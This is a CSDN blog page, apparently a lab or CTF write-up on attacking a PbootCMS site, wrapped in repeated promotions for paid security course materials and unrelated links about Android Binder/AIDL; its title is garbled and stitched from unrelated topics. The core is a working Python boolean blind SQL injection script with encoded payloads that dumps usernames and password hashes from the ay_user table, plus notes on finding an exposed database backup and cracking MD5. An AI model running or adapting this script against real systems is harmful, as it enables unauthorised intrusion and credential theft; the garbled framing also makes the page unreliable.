pbootcms网站实战攻略_pbootcms 乘法(1),2024年最新谈谈网络安全-Binder机制及AIDL使用

最新推荐文章于 2024-05-11 17:04:07 发布
最新推荐文章于 2024-05-11 17:04:07 发布
阅读量670 收藏 19
点赞数 12
分类专栏: 2024年程序员学习 文章标签: web安全 binder 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83621708/article/details/137784916
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

开始修改bool.py脚本,在脚本内容中修改参数,利用构造的盲注语句修改脚本中的语句

这里根据提示,用御剑扫描网站后台,有一个.zip后缀名的数据包,访问后发现数据库文件,找到存储password的表文件为’ay_user’,这里更改content内容表内容,直接跑出content结果。

这里附上Python脚本源码:

import requests
import string

class GetInject:
    chr_str = string.ascii_lowercase + string.punctuation + string.digits 
    def __init__(self,url,mark,obj):
        '''
        obj参数举例:
        obj = "database()"
        obj = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
        '''
        self.url = url
        self.mark = mark
        self.obj = obj
    
    def get_length(self):
        payload_len = "14')%09and%09length({0})%3d{1}%23.html"
        #如果实例参数是双引号型或者整数型,修改payload格式
        i = 1
        while True:
            payload_len_i = payload_len.format(self.obj,i)
            r = requests.get(self.url+payload_len_i)
            if self.mark in r.text:
                print("len",i)
                return i
            i += 1

    def get_name(self):
        name_len = self.get_length()
        payload_name = "14')%09and%09substr({0},{1},1)%3d'{2}'%23.html"
        #payload_name = "14')%09and%09length({0})%3d{1}%23"
        output = ''
        for i in range(1,name_len + 1):
            for c in self.chr_str:  # 直接枚举
                payload_name_i = payload_name.format(self.obj,i,c)
                r = requests.get(url+payload_name_i)
                if self.mark in r.text:
                    output += c
                    print(output)
                    break
        return output

# mark 是判断为True还是False的标志,这里是you are in
url = "http://10.10.5.79:8088/?case/"
mark = "<title>湖南翱云网络科技有限公司-服务案例-PbootCMS-永久开源免费的PHP企业网站开发建设管理系统</title>"
#tables = "(select group_concat(table_name) from information_schema.tables where table_schema=database())"
#columns = "(select group_concat(column_name) from information_schema.columns where table_schema=database())"
content = "(select%09group_concat(username,':',password)%09from%09ay_user)"

database = "database()"
test1 = GetInject(url,mark,content)
test1.get_name()

脚本返回结果:

MD5解密

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

络安全)**
[外链图片转存中…(img-pFf93Cng-1713168466352)]

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_83621708
关注
  • 12
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Binder通信机制AIDL使用
01-03
Android进程间通信(Inter-Process Communication, IPC)采用Binder通信机制,是一种client/server结构。...下面通过一个实例讲解Binder机制以及AIDL使用。 实例说明:Client进程传两个整数a和b给Ser
Android跨进程通信Binder机制AIDL实例
道阻且长,行则将至。
12-04 4262
文章目录进程通信1.1 进程空间划分1.2 跨进程通信IPC1.3 Linux跨进程通信1.4 Android进程通信Binder 跨进程通信2.1 Binder简介2.2 Binder驱动2.3 Binder原理AIDL编程Demo3.1 服务端3.2 客户端 在操作系统中,进程与进程间的内存和数据都是不共享的。这样做的目的,是为了避免进程间相互操作数据的现象发生,从而引起各自的安全问题。为了实现进程隔离,采用了虚拟地址空间,两个进程各自的虚拟地址不同,从逻辑上来实现彼此间的隔离。两个进程之间要进行通信
一文分析Binder机制AIDL的理解
nufuli123的博客
03-04 2665
为什么要去理解Android的进程间通信机制 对于Android开发工程师来说,如果不去理解进程间通信机制也可以使用系统提供的API完成应用开发,但如果想要达到更高的层级,那么就不能简单只会调用API。无论是工作中遇到一些疑难问题,还是想要学习源码的一些功能实现,或者是想要提升APP的性能等,这些工作都需要我们去看系统的源码,而系统的源码中进程间通信无处不在,如果不理解进程间通信机制,那么很难看懂系统源码,而且容易迷失在大量的代码中。 Android 进程间通信机制 为什么使用Binder作为Android
Android IPC进程间通信,Binder机制原理及AIDL实例
csdn_aiyang的博客
08-12 3369
我们知道,Android的底层是使用Linux内核运行的,而Linux为了保证系统的稳定性,使用的是进程隔离的机制,也就是让不同的进程运行在不同的虚拟空间,使得不同进程之间无法共享数据,防止数据的篡改。关于多进程的基础使用及优缺点的介绍链接中已经讲的很清楚了。但是,有时候我们也会遇到不同进程间需要通信的情况,那么,这时候就需要使用Android系统进程间通信IPC(Inter-Process Communication)。
Android Binder机制浅谈以及使用Binder进行跨进程通信的俩种方式(AIDL以及直接利用Binder的transact方法实现)
XJ200012的博客
06-14 4756
此篇文章是对Binder的学习以及使用Binder的方式和总结,图文并茂,附上源码说明
Android中的Binder跨进程通信机制AIDL
且听真言
02-02 2738
在Code中,两个对象直接相互访问的前提是这两个对象都存在于相同的内存地址空间中,如果两个对象分别存在于两个不同的进程中,比如上面我们所说的ActivityManager和ActivityManagerService,那么这两个对象是不能直接调用的,就需要使用一种跨进程通信技术,使存在于两个不同进程的对象能够相互访问,传统的跨进程通信方式:Socket、信号量、管道、共享内存、消息队列等。 Bi...
Android进阶:Binder机制AIDL进程通信学习(使用AIDL模拟支付宝支付案例)
thisfeng
04-19 1600
Android进阶第一关:Binder机制AIDL进程通信学习(模拟支付宝支付案例) 目录 Binder是什么? 从面向对象的思想看 Binder IPC 进程空间的划分 Binder机制是如何跨进程通信的? Binder 到底是什么? 理解Java层的Binder 代码 Android中的AIDL android开发AIDL使用模拟支付宝支付 Binder是什么? Binder是Andr...
Binder机制AIDL中的实现分析
sjm19901003的专栏
11-18 1696
本篇主要通过结合已经阅读的Binder机制相关资料(《Android开发艺术探索》和 http://weishu.me/2016/01/12/binder-index-for-newer/),通过AIDL来进行Binder机制的初步理解感谢两位作者:任玉刚和WeiShu一 一个AIDL Demo的组成部分 二 通信机制的分析 1 bindService 与 onBind 2 代理是如何传递过去的
关于Binder (AIDL)的 oneway 机制
Jason_Lee155的博客
05-13 6805
开篇总结 Binder 是 Android 中的 IPC(进程间通信)的最要一环,它的作用就是: 异步调用(单个binder请求) 应用向 binder 驱动发送数据后不需要挂起线程等待 binder 驱动的回复,而是直接结束。 串行化处理(多个binder请求) 对于一个服务端的 AIDL 接口而言,所有的 oneway 方法不会同时执行,binder 驱动会将他们串行化处理,排队一个一个调用。 像一些系统服务调用应用进程的时候就会使用 oneway,比如 AMS 调用应用进程启动 Activi
Android中的Binder和AIDL
weixin_63261150的博客
08-01 1689
1.Binder1.1简介Binder是一种进程间通信的机。Binder就是Android中的血管,在Android中我们使用Activity,Service等组件都需要和AMS(system_server)进行通信,这种跨进程的通信都是通过Binder完成。Activity,Service等组件和AMS不是同一个进程,其实也是多进程通信。1.2性能Binder相对于传统的Socket方式,更加高效。......
Android 13 - binder阅读(4)- 使用ServiceManager注册服务
青山渺渺
06-25 1551
使用ServiceManager注册服务
Android AIDL使用介绍(3) 浅说AIDL背后的Binder
01-03
在前面的博客中,我们已经学会了使用AIDL进行跨进程通信,AIDL使用比较简单,可实际上跨进程通信是一个相当复杂的过程,例如进程A是怎么找到进程B的,如果有一个进程C冒充进程A,进程B又该如何识别等等问题,而...
Android10.0 Binder通信原理(九)-AIDL Binder示例
01-03
摘要:本节主要来讲解Android10.0 Binder中如何使用AIDL 阅读本文大约需要花费20分钟。 文章首发微信公众号:IngresGe 专注于Android系统级源码分析,Android的平台设计,欢迎关注我,谢谢! [Android取经之路] 的...
nix-binder-example:使用Nix的BinderHub示例
02-04
nix-binder-example:使用Nix的BinderHub示例
aidl跨进程通信demo,亲测可用,binder机制,改完bug
07-16
aidl跨进程通信demo,亲测可用,binder机制,改完bug,好用.
全面升级企业网络安全 迈入SASE新时代
HKT香港电讯的博客
05-08 991
随着数字化业务、云计算、物联网和人工智能等技术的飞速发展,企业的业务部署环境日渐多样化,远程移动设备办公模式的普及,企业多分支机构的加速设立,也使得企业业务系统的用户范围由单一、单点的内部用户扩展至多个分支及多个外部终端,企业数据暴露在互联网中存在安全威胁基于企业运营据点分散化的趋势,越来越多的企业数据暴露在互联网中,网络安全问题层出不穷。企业用户在访问海外互联网时,经常会有不法分子利用不同国家和地区的网络安全环境存在的差异进行网络击。
网络安全公司观察,看F5如何将安全化繁为简
hanniuniu13的博客
05-08 260
通过对多家网络安全公司的观察分析,我们从中选出了有代表性的F5公司。这是一种完全集成的资源和安全服务的SaaS平台,并可用于提供应用到应用安全的连接,是领先于多家网络安全公司的思路。同时,F5的AI安全底座已经有长达10多年的机器学习历史,像互联网行业头部的短视频平台,一些国际上头部运动品牌或者连锁机构都在使用相同的安全底座。F5可以帮用户连接所有的大语言模型,当你想在边缘部署应用推理的时候,可以建一个安全的隧道,帮助他们实现互联,同时在边缘的节点里面实现安全和应用推理,无疑在网络安全公司中脱颖而出。
网络安全(黑客)—-2024自学手册
xv7676的博客
05-06 1689
网络安全可以基于击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到守兼备,毕竟知己知彼,才能百战百胜。
亚信安全发布《2024年第一季度网络安全威胁报告》
最新发布
亚信安全官方账号的博客
05-11 148
亚信安全发布《2024年第一季度网络安全威胁报告》。
spring-cloud-stream-binder-rocketmq如何配置访问rocketmq集群
11-23
根据提供的引用内容,配置spring-cloud-stream-binder-rocketmq访问RocketMQ集群需要在RocketMQ的配置文件中进行。具体步骤如下: 1.在RocketMQ的配置文件中添加以下配置信息: ```properties # 集群名称 rocketmq...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值